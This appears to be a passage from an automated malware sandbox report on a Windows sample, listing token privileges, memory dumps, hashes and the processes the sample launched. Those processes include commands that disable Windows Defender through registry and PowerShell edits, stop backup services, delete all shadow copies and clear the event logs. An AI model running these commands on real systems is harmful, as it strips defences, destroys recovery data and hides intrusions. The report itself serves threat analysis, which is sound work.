| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe"
C:\Windows\SysWOW64\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SamSs" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "VSS" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "wbengine" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "WebClient" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SysWOW64\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl application
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
Files
memory/520-54-0x0000000000000000-mapping.dmp
memory/560-55-0x0000000000000000-mapping.dmp
memory/1736-56-0x0000000000000000-mapping.dmp
memory/1480-57-0x0000000000000000-mapping.dmp
memory/1344-58-0x0000000000000000-mapping.dmp
memory/364-59-0x0000000000000000-mapping.dmp
memory/1188-60-0x0000000000000000-mapping.dmp
memory/1576-61-0x0000000000000000-mapping.dmp
memory/1380-62-0x0000000000000000-mapping.dmp
memory/624-63-0x0000000000000000-mapping.dmp
memory/1584-64-0x0000000000000000-mapping.dmp
memory/1624-65-0x0000000000000000-mapping.dmp
memory/1124-66-0x0000000000000000-mapping.dmp
memory/992-67-0x0000000000000000-mapping.dmp
memory/1588-68-0x0000000000000000-mapping.dmp
memory/1448-69-0x0000000000000000-mapping.dmp
memory/1672-70-0x0000000000000000-mapping.dmp
memory/1952-71-0x0000000000000000-mapping.dmp
memory/688-72-0x0000000000000000-mapping.dmp
memory/728-73-0x0000000000000000-mapping.dmp
memory/1648-74-0x0000000000000000-mapping.dmp
memory/1752-75-0x0000000000000000-mapping.dmp
memory/1664-76-0x0000000000000000-mapping.dmp
memory/1660-77-0x0000000000000000-mapping.dmp
memory/596-78-0x0000000000000000-mapping.dmp
memory/1860-79-0x0000000000000000-mapping.dmp
memory/1824-80-0x0000000000000000-mapping.dmp
memory/1136-81-0x0000000000000000-mapping.dmp
memory/304-82-0x0000000000000000-mapping.dmp
memory/2028-83-0x0000000000000000-mapping.dmp
memory/1624-84-0x0000000000000000-mapping.dmp
memory/1400-85-0x0000000000000000-mapping.dmp
memory/1872-86-0x0000000000000000-mapping.dmp
memory/1212-87-0x0000000000000000-mapping.dmp
memory/544-88-0x0000000000000000-mapping.dmp
memory/1968-89-0x0000000000000000-mapping.dmp
memory/1944-90-0x0000000000000000-mapping.dmp
memory/1504-91-0x0000000000000000-mapping.dmp
memory/1152-92-0x0000000000000000-mapping.dmp
memory/268-93-0x0000000000000000-mapping.dmp
memory/1724-94-0x0000000000000000-mapping.dmp
memory/696-95-0x0000000000000000-mapping.dmp
memory/1000-96-0x0000000000000000-mapping.dmp
memory/1868-97-0x0000000000000000-mapping.dmp
memory/988-98-0x0000000000000000-mapping.dmp
memory/1708-99-0x0000000000000000-mapping.dmp
memory/1960-100-0x0000000000000000-mapping.dmp
memory/1988-101-0x0000000000000000-mapping.dmp
memory/1700-102-0x0000000000000000-mapping.dmp
memory/1580-103-0x0000000000000000-mapping.dmp
memory/856-104-0x0000000000000000-mapping.dmp
memory/1044-105-0x0000000000000000-mapping.dmp
memory/836-106-0x0000000000000000-mapping.dmp
memory/1360-107-0x0000000000000000-mapping.dmp
memory/932-108-0x0000000000000000-mapping.dmp
memory/336-109-0x0000000000000000-mapping.dmp
memory/1696-110-0x0000000000000000-mapping.dmp
memory/1480-111-0x0000000000000000-mapping.dmp
memory/1788-112-0x0000000000000000-mapping.dmp
memory/1796-113-0x0000000000000000-mapping.dmp
memory/892-114-0x0000000000000000-mapping.dmp
memory/624-115-0x0000000000000000-mapping.dmp
memory/920-116-0x0000000000000000-mapping.dmp
memory/2060-117-0x0000000000000000-mapping.dmp
memory/2116-118-0x0000000075471000-0x0000000075473000-memory.dmp
memory/2116-119-0x0000000002480000-0x00000000030CA000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | b05da822fc672cfdb7dee30f2f87afd6 |
| SHA1 | 2e0a89ebf40b8a0b593026d8eec01501e1588a29 |
| SHA256 | fc37f4dc8be0b59d230abbde1141dbdc3d8f4de03796144d871435bdc14e54ce |
| SHA512 | 8359f7eed082fba1dc1d57167dab12dfaa225cc30073e99a31bd9c0fb267a12b0590ab3cf26b3d140e7f6ad8d190151c265b4a17d406e4766dc3031116ccff79 |
memory/2192-122-0x00000000022B0000-0x00000000022B1000-memory.dmp
memory/2192-123-0x00000000022B1000-0x00000000022B2000-memory.dmp
memory/2192-124-0x00000000022B2000-0x00000000022B4000-memory.dmp